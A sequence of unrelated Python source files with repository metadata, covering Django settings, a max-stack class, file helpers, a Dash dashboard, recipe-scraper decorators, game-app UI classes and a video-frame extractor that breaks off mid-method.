'PATH': os.path.join(BASE_DIR, 'whoosh_index'),
}
}
# 当添加、修改、删除数据时,自动生成索引
HAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.RealtimeSignalProcessor'
# 指定搜索结果每页显示的条数
HAYSTACK_SEARCH_RESULTS_PER_PAGE=1
|
[
"964725349@qq.com"
] |
964725349@qq.com
|
bea5e52fc879f85fba8493bf6a11bf65648c44ee
|
05f3f5537ef401946118b07ab0161bcce04cb3a4
|
/main_page/migrations/0004_auto_20210716_0019.py
|
4a723f5cbd4b740ccc1a0cfcd85a88ae8752f501
|
[] |
no_license
|
abhishekotari21/IAFpedia
|
73f8a96ac55d385be98d5b16ea0685428495eb02
|
d2fa096da86ca7ba976fae2242bcf7d362e0f3c5
|
refs/heads/master
| 2023-07-08T09:25:15.408635
| 2021-08-07T17:48:04
| 2021-08-07T17:48:04
| 384,144,297
| 0
| 0
| null | 2021-07-09T10:40:44
| 2021-07-08T14:04:06
|
HTML
|
UTF-8
|
Python
| false
| false
| 333
|
py
|
# Generated by Django 3.1.4 on 2021-07-15 18:49
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('main_page', '0003_hisevent'),
]
operations = [
migrations.RenameModel(
old_name='HisEvent',
new_name='HistoricalEvent',
),
]
|
[
"omkar3602@gmail.com"
] |
omkar3602@gmail.com
|
8c1931de214702eae66c4588ab24ad31368fbe5f
|
6295b232fe750e4d49c40e093af3925b3ae14769
|
/max_stack_da.py
|
b3d5491a3be268ed75ae92c34cbe810fb77eb10f
|
[] |
no_license
|
palaquibay329/QueueStackDynamicArrayfromStaticArray
|
426e38a5d2257d4543c85a9450299ac3bcb0842a
|
f6178051d7d28b23ba4baff68b0f3e4a0177fc5a
|
refs/heads/master
| 2023-08-22T03:51:35.704585
| 2021-10-17T03:53:47
| 2021-10-17T03:53:47
| 418,012,565
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,829
|
py
|
# Course: CS261 - Data Structures
# Student Name: Edgar Palaquibay
# Assignment: 2
# Description: This script is a max stack implementation using dynamic arrays. The newly implemented
# methods are push(), pop(), top(), get_max().
from dynamic_array import *
class StackException(Exception):
"""
Custom exception to be used by Stack class
DO NOT CHANGE THIS METHOD IN ANY WAY
"""
pass
class MaxStack:
def __init__(self):
"""
Init new stack based on Dynamic Array
DO NOT CHANGE THIS METHOD IN ANY WAY
"""
self.da_val = DynamicArray()
self.da_max = DynamicArray()
def __str__(self) -> str:
"""
Return content of stack in human-readable form
DO NOT CHANGE THIS METHOD IN ANY WAY
"""
out = "MAX STACK: " + str(self.da_val.length()) + " elements. ["
out += ', '.join([str(self.da_val[i]) for i in range(self.da_val.length())])
return out + ']'
def is_empty(self) -> bool:
"""
Return True is the stack is empty, False otherwise
DO NOT CHANGE THIS METHOD IN ANY WAY
"""
return self.da_val.is_empty()
def size(self) -> int:
"""
Return number of elements currently in the stack
DO NOT CHANGE THIS METHOD IN ANY WAY
"""
return self.da_val.length()
# -----------------------------------------------------------------------
def push(self, value: object) -> None:
"""
Input: value (object)
Output: N/A
This function will add a new element to the stop of the stack
"""
if self.size() == 0:
self.da_val.append(value)
if self.da_max.length() == 0:
self.da_max.append(value)
elif value <= self.da_max.get_at_index(self.da_max.length()-1):
arg = self.da_max.get_at_index(self.da_max.length()-1)
self.da_max.append(arg) #append the current max of da_max onto da_max again
self.da_val.append(value)
else:
self.da_max.append(value) #append the value argument to da_max since it's larger than current max
self.da_val.append(value)
def pop(self) -> object:
"""
Input: N/A
Output: object
This function returns the top value of the da_val stack, it also removes the top value from da_max stack but
does not return it
"""
if self.is_empty():
raise StackException()
else:
value = self.da_val.get_at_index(self.size() - 1) #capture the top value of the stack before removing
self.da_val.remove_at_index(self.size() - 1)
self.da_max.remove_at_index(self.da_max.length() - 1)
return value
def top(self) -> object:
"""
Input: N/A
Output: object
This function will return the top value of the da_val stack and raise an exception if empty
"""
if self.is_empty():
raise StackException()
return self.da_val.get_at_index(self.da_val.length() - 1) #return top of stack
def get_max(self) -> object:
"""
Input: N/A
Output: object
This function returns the maximum value that is in the stack, if the stack is empty the method raises a
"StackException"
"""
if self.is_empty():
raise StackException()
return self.da_max.data[self.da_max.length() - 1] #return top of max stack
# ------------------- BASIC TESTING -----------------------------------------
if __name__ == "__main__":
print("\n# push example 1")
s = MaxStack()
print(s)
for value in [1, 2, 3, 4, 5]:
s.push(value)
print(s)
print("\n# pop example 1")
s = MaxStack()
try:
print(s.pop())
except Exception as e:
print("Exception:", type(e))
for value in [1, 2, 3, 4, 5]:
s.push(value)
for i in range(6):
try:
print(s.pop())
except Exception as e:
print("Exception:", type(e))
print("\n# top example 1")
s = MaxStack()
try:
s.top()
except Exception as e:
print("No elements in stack", type(e))
s.push(10)
s.push(20)
print(s)
print(s.top())
print(s.top())
print(s)
print('\n# get_max example 1')
s = MaxStack()
for value in [1, -20, 15, 21, 21, 40, 50]:
print(s, ' ', end='')
try:
print(s.get_max())
except Exception as e:
print(type(e))
s.push(value)
while not s.is_empty():
print(s.size(), end='')
print(' Pop value:', s.pop(), ' get_max after: ', end='')
try:
print(s.get_max())
except Exception as e:
print(type(e))
|
[
"edgarpalaquibay@MacBook-Pro-2.fios-router.home"
] |
edgarpalaquibay@MacBook-Pro-2.fios-router.home
|
ea25f40064c0389cfee15171a0479f3f66af28c1
|
84827140ca49fb71bccb79d7b6e19b2d2ae7ada4
|
/profile_test.py
|
5b32caf3420cb9502fad2b7ec6dca9f49035969e
|
[
"BSD-2-Clause"
] |
permissive
|
CyclingNinja/sunkit-sst
|
df312fc51440689885fedc29a5e48f749f9e8445
|
3abb8676eb0f6e6881abf8159777bb1ee3d30e01
|
refs/heads/master
| 2021-01-14T13:38:47.648658
| 2015-01-30T14:09:38
| 2015-01-30T14:09:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,115
|
py
|
from __future__ import absolute_import, division
from sunkitsst.sstmap import get_header_item_group, SSTMap
import sunpy.map as smap
from sunkitsst.read_cubes import read_cubes
from sunkitsst.visualisation import cube_explorer
import numpy as np
import matplotlib.pyplot as plt
import glob
plt.ion()
smap.Map.register(SSTMap, SSTMap.is_source_for)
imfile = '/data/SST/fastrbe/sstdata.icube'
spfile = '/data/SST/fastrbe/sstdata.sp.icube'
im_header, outmemmap, sp_header, sp_cube = read_cubes(imfile, spfile, memmap = True)
files = glob.glob("/data/Mounted/SWAT/fastrbe/sst2sdo/fits/sst/halpha/*.fits")
files.sort()
first_maps = smap.Map(files[0])
cadence = 2.195 #s
x = get_header_item_group(first_maps.meta, 'lpos_')
x.sort()
waves = list(zip(*x)[1])
waves.sort()
axis_range = [np.arange(0,cadence*outmemmap.shape[0],cadence), waves] + [first_maps.yrange] + [first_maps.xrange]
fig = plt.figure(figsize=(16,14))
moose = cube_explorer.PlotInteractor(outmemmap, first_maps.meta['cdelt1'], '/home/nabobalis/Dropbox/SavedSlits/',
axis_range=None, cmap='Greys_r', fig=fig, colorbar=True)
|
[
"nabil.freij@gmail.com"
] |
nabil.freij@gmail.com
|
8aba048efabe65a374ecb7ea6a348edc52b17054
|
bc33dcd135f6682a70d9423a9d30108640bfd1c7
|
/Python Snippets/helpers/file.py
|
ccd799a93dca7a2c66b0f8b1b153040df1d4da18
|
[
"MIT"
] |
permissive
|
wolfnfox/Code-Snippets
|
3bc95e3d8692396f649a89a61f456c75d7d46738
|
993cb2b273d538bdeb76ff3a39fa41a92a6282de
|
refs/heads/master
| 2020-06-23T10:18:35.044448
| 2019-10-08T10:15:20
| 2019-10-08T10:15:20
| 198,594,562
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,049
|
py
|
import logging, os, shutil
import numpy as np
from typing import Union
def append_all_text(text: str,filename: str,encoding: str=r'utf-8') -> bool:
if not isinstance(text,str):
raise ValueError('Invalid argument for <text>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(text)))
if not isinstance(filename,str):
raise ValueError('Invalid argument for <filename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(filename)))
if not isinstance(encoding,str):
raise ValueError('Invalid argument for <encoding>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(encoding)))
if not fileexists(filename):
raise FileNotFoundError()
return _writefile(text,filename,'at',encoding)
def copy(fromfilename: str,tofilename: str=None,overwrite: bool=False) -> str:
if not isinstance(fromfilename,str):
raise ValueError('Invalid argument for <fromfilename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(fromfilename)))
if tofilename and not isinstance(tofilename,str):
raise ValueError('Invalid argument for <tofilename>.\nAccepted types: '+str(None)+', '+str(str)+'\nGot type: '+str(type(tofilename)))
if not isinstance(overwrite,bool):
raise ValueError('Invalid argument for <overwrite>.\nAccepted types: '+str(bool)+'\nGot type: '+str(type(overwrite)))
if not fileexists(fromfilename):
raise FileNotFoundError()
if (not tofilename):
tofilename = fromfilename
if (not overwrite):
tofilename = _increment_filename(tofilename)
shutil.copy2(fromfilename,tofilename)
else:
if fileexists(tofilename):
move(fromfilename,tofilename,overwrite)
else:
shutil.copy2(fromfilename,tofilename)
logging.info('Copied file: '+str(fromfilename))
logging.info('Copied to: '+str(tofilename))
return tofilename
def delete(filename: str) -> bool:
if not isinstance(filename,str):
raise ValueError('Invalid argument for <filename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(filename)))
if not fileexists(filename):
raise FileNotFoundError
os.remove(filename)
logging.info('Deleted file: '+str(filename))
return True
def fileexists(filename: str) -> bool:
if not isinstance(filename,str):
raise ValueError('Invalid argument for <filename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(filename)))
return os.path.isfile(filename)
def filesize(filename: str,units: str=None) -> int:
'''Returns filesize (defaults to 'KB')\n
Options: 'B', 'KB', or 'MB' '''
if not fileexists(filename):
raise FileNotFoundError
if units not in ['B', 'KB', 'MB', None]:
raise ValueError('Invalid argument for <units>.\nAccepted types: '+str(str)+' \'B\', \'KB\', \'MB\' or '+str(None)+'\nGot type: '+str(type(units))+' \''+str(units)+'\'')
filesize = os.stat(filename).st_size
if (units == 'KB') or (units == None):
if (filesize > 1024):
filesize = int(np.ceil(filesize/1024))
else:
filesize = np.ceil((filesize*1000)/1024)/1000
if units == 'MB':
if (filesize > (1024**2)):
filesize = int(np.ceil(filesize/(1024**2)))
else:
filesize = np.ceil((filesize*1000**2)/(1024**2)/(1000))/1000
return filesize
def get_extension(filename: str) -> str:
if not isinstance(filename,str):
raise ValueError('Invalid argument for <filename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(filename)))
return os.path.splitext(filename)[-1]
def move(fromfilename: str,tofilename: str,overwrite: bool=True) -> str:
if not isinstance(fromfilename,str):
raise ValueError('Invalid argument for <fromfilename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(fromfilename)))
if not isinstance(tofilename,str):
raise ValueError('Invalid argument for <tofilename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(tofilename)))
if not isinstance(overwrite,bool):
raise ValueError('Invalid argument for <overwrite>.\nAccepted types: '+str(bool)+'\nGot type: '+str(type(overwrite)))
if fileexists(tofilename) and (not overwrite):
tofilename = _increment_filename(tofilename)
shutil.move(fromfilename,tofilename)
logging.info('Moved file: '+str(fromfilename))
logging.info('Moved to: '+str(tofilename))
return tofilename
def read_all_bytes(filename: str) -> bytes:
if not isinstance(filename,str):
raise ValueError('Invalid argument for <filename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(filename)))
if not fileexists(filename):
raise FileNotFoundError()
return _readfile(filename,'rb')
def read_all_text(filename: str,encoding: str=r'utf-8') -> str:
if not isinstance(filename,str):
raise ValueError('Invalid argument for <filename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(filename)))
if not isinstance(encoding,str):
raise ValueError('Invalid argument for <encoding>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(encoding)))
if not fileexists(filename):
raise FileNotFoundError()
return _readfile(filename,'rt',encoding)
def write_all_bytes(bytesdata: bytes,filename: str,overwrite: bool=True) -> bool:
if not isinstance(bytesdata,bytes):
raise ValueError('Invalid argument for <bytesdata>.\nAccepted types: '+str(bytes)+'\nGot type: '+str(type(bytesdata)))
if not isinstance(filename,str):
raise ValueError('Invalid argument for <filename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(filename)))
if not isinstance(overwrite,bool):
raise ValueError('Invalid argument for <overwrite>.\nAccepted types: '+str(bool)+'\nGot type: '+str(type(overwrite)))
if fileexists(filename) and not overwrite:
raise FileExistsError()
return _writefile(bytesdata,filename,'wb')
def write_all_text(text: str,filename: str,encoding: str=r'utf-8',overwrite: bool=True) -> bool:
if not isinstance(text,str):
raise ValueError('Invalid argument for <text>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(text)))
if not isinstance(filename,str):
raise ValueError('Invalid argument for <filename>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(filename)))
if not isinstance(encoding,str):
raise ValueError('Invalid argument for <encoding>.\nAccepted types: '+str(str)+'\nGot type: '+str(type(encoding)))
if not isinstance(overwrite,bool):
raise ValueError('Invalid argument for <overwrite>.\nAccepted types: '+str(bool)+'\nGot type: '+str(type(overwrite)))
if fileexists(filename) and not overwrite:
raise FileExistsError()
return _writefile(text,filename,'wt',encoding)
def _increment_filename(filename: str) -> str:
'''Private function to generate incremented filename if the input <filename> already exists.\n
Otherwise, returns the <filename> unaltered.'''
if not fileexists(filename):
return filename
else:
i = 1
ext = get_extension(filename)
newfilename = filename.replace(ext,'('+str(i)+')'+ext)
while fileexists(newfilename):
i += 1
newfilename = filename.replace(ext,'('+str(i)+')'+ext)
return newfilename
def _readfile(filename: str,options: str,encoding: str=None) -> Union[bytes,str]:
'''Private function for reading a file in full.'''
if encoding:
with open(filename,options,encoding=encoding) as fopen:
data = fopen.read()
else:
with open(filename,options) as fopen:
data = fopen.read()
return data
def _writefile(data: Union[bytes,str],filename: str,options: str,encoding: str=None) -> bool:
'''Private function for wrapping io.open'''
if encoding:
with open(filename,options,encoding=encoding) as fopen:
fopen.write(data)
else:
with open(filename,options) as fopen:
fopen.write(data)
return True
|
[
"thomasf@cleardata.co.uk"
] |
thomasf@cleardata.co.uk
|
c36b8f1787c7aa2a5b3eacac7ad71daf101b0922
|
1d4f3a96f1c89ed617a6106f64dc66ece645abc7
|
/data_structure/tree/isBST.py
|
6bd337db7e3e0f2b1cd36cceedf4d540ddf3559b
|
[] |
no_license
|
RahulBhoir/Python-Projects
|
8f85504aa4a09ae8778d4a6775eed4e831b43c98
|
ae59dc49f2a6a52c3eb391e412a677f8d08e3ce3
|
refs/heads/master
| 2021-07-24T12:28:32.202481
| 2021-06-30T10:42:06
| 2021-06-30T10:42:06
| 170,374,879
| 1
| 0
| null | 2020-12-20T17:43:16
| 2019-02-12T19:07:12
|
Python
|
UTF-8
|
Python
| false
| false
| 716
|
py
|
root = None
max_value = 100000
min_value = -100000
class Node():
def __init__(self, data):
self.data = data
self.left = None
self.right = None
def isBST(root, min_value, max_value):
if root is None:
return True
if (root.data < max_value and root.data > min_value and
isBST(root.left, min_value, root.data) and isBST(root.right, root.data, max_value)):
return True
else:
return False
root = Node(11)
root.left = Node(9)
root.right = Node(13)
root.left.left = Node(7)
root.left.right = Node(10)
root.right.left = Node(12)
root.right.right = Node(15)
root.right.right.left = Node(14)
tree = isBST(root, min_value, max_value)
print(tree)
|
[
"rahulpbhoir@outlook.com"
] |
rahulpbhoir@outlook.com
|
273b8c7282b3d2ecbeda4d37b4950bdf457546e9
|
c2a9dc489f924e8d96ae3b9df83f4bb189adb563
|
/assignments/10AlternaCaracteres/src/exercise.py
|
43ea541b1b3bb4e8478d0155b1b1a75da9ad89aa
|
[] |
no_license
|
Cursoi-TC1028/Examen-Parcial
|
a018a80c6e9050cc91e0dfc8ad4334ac379d7e37
|
69ca6414f5c6b50312645a5f4eef370235aca49e
|
refs/heads/main
| 2023-07-24T10:31:44.733594
| 2021-09-09T04:20:01
| 2021-09-09T04:20:01
| 404,479,991
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 257
|
py
|
def main():
#escribe tu código abajo de esta línea
n = int(input())
cont = 1
while (cont <= n) :
if cont % 2 != 0:
print("#")
else :
print("%")
cont += 1
if __name__=='__main__':
main()
|
[
"69440193+mannyRam24-Mter@users.noreply.github.com"
] |
69440193+mannyRam24-Mter@users.noreply.github.com
|
8a778a834551e872b7c730e425b78c860d4a6eaa
|
71854d518b0513b4e09e82cf38dbd3dd2d6f44f8
|
/apptesting.py
|
47374d83ae4d8da99289699f0fd06818497c2077
|
[] |
no_license
|
hcxie/linkedin-datavisual-app-testing
|
5d0fc613f50bb26ef09fa4ce5f63d06299a0c813
|
e08ae54348f65967b53d781e007a6e13697016fd
|
refs/heads/master
| 2020-05-19T22:36:21.201983
| 2019-05-06T22:39:50
| 2019-05-06T22:39:50
| 185,249,789
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,478
|
py
|
import dash
import dash_core_components as dcc
import dash_html_components as html
import pandas as pd
from dash.dependencies import Input, Output
import plotly.graph_objs as go
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
def read_merge_data(filename):
df=pd.read_csv(filename)
df.set_index(pd.DatetimeIndex(df['date']),inplace=True)
df['yearmonth']=pd.to_datetime(df['date'], format='%Y/%m').map(lambda x: x.year)
df.drop(['date'],axis=1,inplace=True)
return df
tempdf=read_merge_data('it_merge_df.csv')
x_labels=tempdf['yearmonth']
available_indicators=list(tempdf.columns[0:2])
available_indicators2=list(tempdf.columns[2:7])
sector_list={
1:'real_estate',#XLRE
2:'utilities',#XLU
3:'it',#XLK
4:'financial',#XLF
5:'healthcare',#XLV
6:'consumer_staples',#XLP
7:'consumer_discretionary',#XLY
8:'basic_material',#XLB
9:'energy',#XLE
10:'industrials'}#XLI
sector_name=[val for key,val in sector_list.items()]
server = app.server
app.layout = html.Div([
html.Div([
html.Div([
html.Label('Sector Dropdown'),
dcc.Dropdown(
id='sector_dropdown',
options=[
{'label': 'Real Estate', 'value': 1},
{'label': 'Utilities', 'value': 2},
{'label': 'IT', 'value': 3},
{'label': 'Financial', 'value': 4},
{'label': 'Healthcare', 'value': 5},
{'label': 'Consumer Staples', 'value': 6},
{'label': 'Consumer Discretionary', 'value': 7},
{'label': 'Basic Material', 'value': 8},
{'label': 'Energy', 'value': 9},
{'label': 'Industrials', 'value': 10}
],
value=[3],
multi=True
)],
style={'width': '48%', 'display': 'inline-block'}),
html.Div([
html.Label('Linkedin info Dropdown'),
dcc.Dropdown(
id='yaxis-column',
options=[{'label': i, 'value': i} for i in available_indicators],
value='employees_on_platform'
),
],style={'width': '48%', 'float': 'right', 'display': 'inline-block'})
]),
dcc.Graph(id='indicator-graphic'),
html.Div([
html.Label('time-slider'),
dcc.Slider(
id='year--slider',
min=x_labels.min(),
max=x_labels.max(),
value=x_labels.max(),
marks={str(year): str(year)[2:] for year in x_labels.unique()},
step=20
)],
style={'width': '99%'}),
html.Div([
html.Div([
html.Label('Stock Feature'),
dcc.Dropdown(
id='yaxis-column2',
options=[{'label': i, 'value': i} for i in available_indicators2],
value='adj_close_stock'
),
],style={'width': '99%'})
]),
dcc.Graph(id='indicator-graphic2'),
html.Div([
html.Label('time-slider'),
dcc.Slider(
id='year--slider2',
min=x_labels.min(),
max=x_labels.max(),
value=x_labels.max(),
marks={str(year): str(year)[2:] for year in x_labels.unique()},
step=20
)],
style={'width': '99%'}),
])
@app.callback(
Output('indicator-graphic', 'figure'),
[Input('year--slider', 'value'),
Input('yaxis-column', 'value'),
Input('sector_dropdown', 'value'),
])
def update_graph(selected_year,yaxis_column_name,sector_dropdown):
traces=[]
for i in sector_dropdown:
sector_file_name=sector_list[i]+'_merge_df.csv'
tempdf=read_merge_data(sector_file_name)
sector_tempdf=tempdf[tempdf['yearmonth']<=selected_year]
traces.append(go.Scatter(
x=sector_tempdf.index,
y=sector_tempdf[yaxis_column_name],
#text=df_by_continent['country'],
mode='lines',
opacity=0.7,
marker={
'size': 15,
'line': {'width': 0.5, 'color': 'white'}
},
name=i
))
return {
'data': traces,
'layout': go.Layout(
xaxis={
'title': 'Year',
},
yaxis={
'title': yaxis_column_name,
},
margin={'l': 40, 'b': 40, 't': 10, 'r': 0},
hovermode='closest'
)
}
@app.callback(
Output('indicator-graphic2', 'figure'),
[Input('year--slider2', 'value'),
Input('yaxis-column2', 'value'),
Input('sector_dropdown', 'value'),
])
def update_graph(selected_year,yaxis_column_name,sector_dropdown):
traces=[]
for i in sector_dropdown:
sector_file_name=sector_list[i]+'_merge_df.csv'
tempdf=read_merge_data(sector_file_name)
sector_tempdf=tempdf[tempdf['yearmonth']<=selected_year]
traces.append(go.Scatter(
x=sector_tempdf.index,
y=sector_tempdf[yaxis_column_name],
#text=df_by_continent['country'],
mode='lines',
opacity=0.7,
marker={
'size': 15,
'line': {'width': 0.5, 'color': 'white'}
},
name=i
))
return {
'data': traces,
'layout': go.Layout(
xaxis={
'title': 'Year',
},
yaxis={
'title': yaxis_column_name,
},
margin={'l': 40, 'b': 40, 't': 10, 'r': 0},
hovermode='closest'
)
}
if __name__ == '__main__':
app.run_server(debug=True)
|
[
"jbdx6307@gmail.com"
] |
jbdx6307@gmail.com
|
0f40308406e38359eb00bd87c471b5f1ff5f6778
|
0fba89a7703d883231decbb5b748d4df22832e6a
|
/recipe_scrapers/_decorators.py
|
87fb968ea2b97ba5373f8906f7b9acf4f19879ef
|
[
"MIT"
] |
permissive
|
tobiaghiraldini/recipe-scrapers
|
c66f1fb448f6e696677ec95d43a595be8470e890
|
1ced80d25dcc6e88877c26187990f112f3134e67
|
refs/heads/master
| 2022-07-04T20:31:07.114353
| 2020-05-20T10:42:26
| 2020-05-20T10:42:26
| 262,996,294
| 0
| 0
|
MIT
| 2020-05-11T09:23:45
| 2020-05-11T09:23:45
| null |
UTF-8
|
Python
| false
| false
| 1,895
|
py
|
import functools
from language_tags import tags
from ._schemaorg import SchemaOrgException
class Decorators:
@staticmethod
def schema_org_priority(decorated):
"""
Use SchemaOrg parser with priority (if there's data in it)
On exception raised - continue by default.
If there's no data (no schema implemented on the site) - continue by default
"""
@functools.wraps(decorated)
def schema_org_priority_wrapper(self, *args, **kwargs):
function = getattr(self.schema, decorated.__name__)
if not function:
raise SchemaOrgException(
"Function '{}' not found in schema"
.format(decorated.__name)
)
if not self.schema.data:
return decorated(self, *args, **kwargs)
try:
value = function(*args, **kwargs)
except SchemaOrgException:
return decorated(self, *args, **kwargs)
return value or decorated(self, *args, **kwargs)
return schema_org_priority_wrapper
@staticmethod
def og_image_get(decorated):
@functools.wraps(decorated)
def og_image_get_wrapper(self, *args, **kwargs):
try:
image = self.soup.find(
'meta',
{'property': 'og:image', 'content': True}
)
return image.get('content')
except AttributeError:
return decorated(self, *args, **kwargs)
return og_image_get_wrapper
@staticmethod
def bcp47_validate(decorated):
@functools.wraps(decorated)
def bcp47_validate_wrapper(self, *args, **kwargs):
tag = tags.tag(decorated(self, *args, **kwargs))
return str(tag) if tag.valid else None
return bcp47_validate_wrapper
|
[
"hhursev@gmail.com"
] |
hhursev@gmail.com
|
b3a0f7392ad91b35f21b7aaa9a6aeac03fdbf6f0
|
9457a7eb9c1d64e203d85b45b3337f06768f28af
|
/python/OV1Info/app/classes.py
|
d93f55ea6d4ed1526b1150dbe808cea822cb83ee
|
[] |
no_license
|
acclub/apps
|
1173a7295714086a34f3896ec54025b2eab34290
|
f86e5a56e6908823256133cba83590a31a7fe19c
|
refs/heads/master
| 2021-01-10T14:43:21.392018
| 2016-09-30T21:32:40
| 2016-09-30T21:32:40
| 47,973,886
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,719
|
py
|
import ac
import math
import configparser
class Window:
# INITIALIZATION
def __init__(self, name="defaultAppWindow", title="", icon=True, width=100, height=100, scale=1, texture=""):
# local variables
self.name = name
self.title = title
self.width = width
self.height = height
self.x = 0
self.y = 0
self.is_attached = False
self.attached_l = -1
self.attached_r = -1
# creating the app window
self.app = ac.newApp(self.name)
# default settings
ac.drawBorder(self.app, 0)
ac.setBackgroundOpacity(self.app, 0)
if icon is False:
ac.setIconPosition(self.app, 0, -10000)
# applying settings
ac.setTitle(self.app, self.title)
ac.setBackgroundTexture(self.app, texture)
ac.setSize(self.app, math.floor(self.width*scale), math.floor(self.height*scale))
# PUBLIC METHODS
def onRenderCallback(self, func):
ac.addRenderCallback(self.app, func)
return self
def setBgOpacity(self, alpha):
ac.setBackgroundOpacity(self.app, alpha)
return self
def border(self, value):
ac.drawBorder(self.app, value)
return self
def setBgTexture(self, texture):
ac.setBackgroundTexture(self.app, texture)
return self
def setPos(self, x, y):
self.x = x
self.y = y
ac.setPosition(self.app, self.x, self.y)
return self
def getPos(self):
self.x, self.y = ac.getPosition(self.app)
return self
#-#####################################################################################################################################-#
class Label:
# INITIALIZATION
def __init__(self, window, text = ""):
self.text = text
self.label = ac.addLabel(window, self.text)
self.size = { "w" : 0, "h" : 0 }
self.pos = { "x" : 0, "y" : 0 }
self.color = (1, 1, 1, 1)
self.bgColor = (0, 0, 0, 1)
self.fontSize = 12
self.align = "left"
self.bgTexture = ""
self.opacity = 1
# PUBLIC METHODS
def setText(self, text):
self.text = text
ac.setText(self.label, self.text)
return self
def setSize(self, w, h):
self.size["w"] = w
self.size["h"] = h
ac.setSize(self.label, self.size["w"], self.size["h"])
return self
def setPos(self, x, y):
self.pos["x"] = x
self.pos["y"] = y
ac.setPosition(self.label, self.pos["x"], self.pos["y"])
return self
def setColor(self, color):
self.color = color
ac.setFontColor(self.label, *self.color)
return self
def setFontSize(self, fontSize):
self.fontSize = fontSize
ac.setFontSize(self.label, self.fontSize)
return self
def setAlign(self, align = "left"):
self.align = align
ac.setFontAlignment(self.label, self.align)
return self
def setBgTexture(self, texture):
self.bgTexture = texture
ac.setBackgroundTexture(self.label, self.bgTexture)
return self
def setBgColor(self, color):
ac.setBackgroundColor(self.label, *color)
return self
def setBgOpacity(self, opacity):
ac.setBackgroundOpacity(self.label, opacity)
return self
def setVisible(self, value):
ac.setVisible(self.label, value)
return self
#-#####################################################################################################################################-#
class Button:
# INITIALIZATION
def __init__(self, window, clickFunc, width=60, height=20, x=0, y=0, text="", texture=""):
self.width = width
self.height = height
self.x = x
self.y = y
self.button = ac.addButton(window, text)
# adding default settings
self.setSize(width, height)
self.setPos(x, y)
if texture != "":
self.setBgTexture(texture)
# default settings
ac.drawBorder(self.button, 0)
ac.setBackgroundOpacity(self.button, 0)
# adding a click event
ac.addOnClickedListener(self.button, clickFunc)
# PUBLIC METHODS
def setSize(self, width, height):
self.width = width
self.height = height
ac.setSize(self.button, self.width, self.height)
return self
def setPos(self, x, y):
self.x = x
self.y = y
ac.setPosition(self.button, self.x, self.y)
return self
def setBgTexture(self, texture):
ac.setBackgroundTexture(self.button, texture)
return self
#-#####################################################################################################################################-#
class Config:
# INITIALIZATION
def __init__(self, path, filename):
self.file = path + filename
self.parser = 0
try:
self.parser = configparser.RawConfigParser()
except:
ac.console("OV1: Config -- Failed to initialize ConfigParser.")
# read the file
self._read()
# LOCAL METHODS
def _read(self):
self.parser.read(self.file)
def _write(self):
with open(self.file, "w") as cfgFile:
self.parser.write(cfgFile)
# PUBLIC METHODS
def has(self, section=None, option=None):
if section is not None:
# if option is not specified, search only for the section
if option is None:
return self.parser.has_section(section)
# else, search for the option within the specified section
else:
return self.parser.has_option(section, option)
# if section is not specified
else:
ac.console("OV1: Config.has -- section must be specified.")
def set(self, section=None, option=None, value=None):
if section is not None:
# if option is not specified, add the specified section
if option is None:
self.parser.add_section(section)
self._write()
# else, add the option within the specified section
else:
if not self.has(section, option) and value is None:
ac.console("OV1: Config.set -- a value must be passed.")
else:
self.parser.set(section, option, value)
self._write()
# if sections is not specified
else:
ac.console("OV1: Config.set -- section must be specified.")
def get(self, section, option, type = ""):
if self.has(section) and self.has(section, option):
# if option request is an integer
if type == "int":
return self.parser.getint(section, option)
# if option request is a float
elif type == "float":
return self.parser.getfloat(section, option)
# if option request is boolean
elif type == "bool":
return self.parser.getboolean(section, option)
# it must be a string then!
else:
return self.parser.get(section, option)
else:
return -1
def remSection(self, section):
if self.has(section):
self.parser.remove_section(section)
self._write()
else:
ac.console("OV1: Config.remSection -- section not found.")
def remOption(self, section, option):
if self.has(section) and self.has(section, option):
self.parser.remove_option(section, option)
self._write()
else:
ac.console("OV1: Config.remOption -- option not found.")
|
[
"illvdg13@gmail.com"
] |
illvdg13@gmail.com
|
d9e5e750b84c63450d958537f59dbc8b3863f3b4
|
2194df5490666825d382e6e47bd33139b1faf0df
|
/vtools/videotoimage.py
|
ff6b9cb5e919adadbff64930f5eb8a56adafd551
|
[] |
no_license
|
aiporre/video_tools
|
a88a3134c6148bd384c71e846aeab49da6bfab8e
|
f955c22fc7259a4b45592f522bb80f0533e6093d
|
refs/heads/master
| 2021-08-02T21:03:53.344844
| 2021-07-28T16:45:57
| 2021-07-28T16:45:57
| 213,970,927
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,568
|
py
|
import cv2
import argparse
import os
from tqdm import tqdm
class VideoToImage(object):
def __init__(self, src=0, output_path = './', extension = '.jpg', prefix='frame_', padding=-1):
# Create a VideoCapture object
self.capture = cv2.VideoCapture(src)
self.output_path = output_path
self.frame_counter = 0
# resolution of the video
self.frame_width = int(self.capture.get(3))
self.frame_height = int(self.capture.get(4))
self.n_frames = int(self.capture.get(7))
self.extension = extension
self.prefix = prefix
self.padding = padding
def update(self):
# Read the next frame
if self.capture.isOpened():
(self.status, self.frame) = self.capture.read()
self.frame_counter +=1
def show_frame(self):
